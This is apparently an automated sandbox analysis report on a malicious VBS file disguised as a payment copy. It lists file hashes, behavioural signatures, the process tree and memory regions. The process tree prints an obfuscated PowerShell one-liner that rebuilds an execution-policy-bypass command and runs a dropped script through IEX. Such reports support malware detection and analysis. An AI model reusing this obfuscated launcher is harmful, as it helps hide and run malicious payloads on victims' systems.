Analysis
-
max time kernel
120s -
max time network
120s -
platform
windows7_x64 -
resource
win7-en-20211014 -
submitted
18-11-2021 19:18
General
-
Target
U2M19O_Payment_Copy.vbs
-
Size
2KB
-
MD5
13f187df5383e456f90b6c337d9fc0e7
-
SHA1
5a37a0a1d44f7fd4323234d1a6c8264da4a64ee4
-
SHA256
816d9c966736b02b56d23629f8968fdb4f910fd575c4c07b524bd51948c5d4ed
-
SHA512
51d4373ab08780bd7d746f961feb8f8749967bba0c2e785aaeb18b961a62c364be63c86ec3df969e17ea987454ea76628d13d1c0127886f2ac5f840a4af2b6d9
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\U2M19O_Payment_Copy.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $cc = 'by------------s'.Replace('------------','pas');$bb = '-ex++++++++++++++++icy'.Replace('++++++++++++++++','ecutionpol');$aa = '-no--------------le'.Replace('--------------','profi');$dd = 'C:\Us<<<<<<<<<>>>>>>>>>ar.ps1'.Replace('<<<<<<<<<>>>>>>>>>','ers\Public\Downloads\HB');$Run = 'Powers-----------------dd'.Replace('-----------------','hell $aa $bb $cc -file $');($Run -Join '')|&('I'+'eX')2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -file C:\Users\Public\Downloads\HBar.ps13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
251148e43b64c05e37fd6dda73828d47
SHA16e2ba0631c07453aef96e440fbbccae05b900ff8
SHA2562162ed1ba81c1c9159a5f6518a2fc6353595f8be9cabb4e8031a3b6eeacf4a11
SHA512645c74035921c1b7155b326d6bc61d39fd6928774e0e6d3c00353a3674c31f7605c5d74d7e008ea800cb0602def48dc0b2991c38018ed2fae65c7fc55e9995f1
-
C:\Users\Public\Downloads\HBar.ps1MD5
1bae7491228ed609f685e4ddf0495777
SHA1e559d10117c683e0dd5d4aac67ae37e6ec29631b
SHA256f59cff14d9c84126dbfbc12e256f0f6f82e29250920d3d0ecb298a360d501375
SHA512b757a741ab26161e022ecf7060e41705132c8c099c52a22799c2ef5612d918b19eef782d4bce7aaeed3e99532e0b87e828348bb805160fbb590e38d3afd08035
-
memory/472-65-0x0000000001F6B000-0x0000000001F8A000-memory.dmpFilesize
124KB
-
memory/472-60-0x0000000001F62000-0x0000000001F64000-memory.dmpFilesize
8KB
-
memory/472-61-0x0000000001F64000-0x0000000001F67000-memory.dmpFilesize
12KB
-
memory/472-58-0x000007FEF2640000-0x000007FEF319D000-memory.dmpFilesize
11.4MB
-
memory/472-56-0x0000000000000000-mapping.dmp
-
memory/472-59-0x0000000001F60000-0x0000000001F62000-memory.dmpFilesize
8KB
-
memory/1192-67-0x0000000002410000-0x0000000002412000-memory.dmpFilesize
8KB
-
memory/1192-68-0x0000000002412000-0x0000000002414000-memory.dmpFilesize
8KB
-
memory/1192-69-0x0000000002414000-0x0000000002417000-memory.dmpFilesize
12KB
-
memory/1192-66-0x000007FEF2640000-0x000007FEF319D000-memory.dmpFilesize
11.4MB
-
memory/1192-70-0x000000001B740000-0x000000001BA3F000-memory.dmpFilesize
3.0MB
-
memory/1192-62-0x0000000000000000-mapping.dmp
-
memory/1192-72-0x000000000241B000-0x000000000243A000-memory.dmpFilesize
124KB
-
memory/1684-55-0x000007FEFBC51000-0x000007FEFBC53000-memory.dmpFilesize
8KB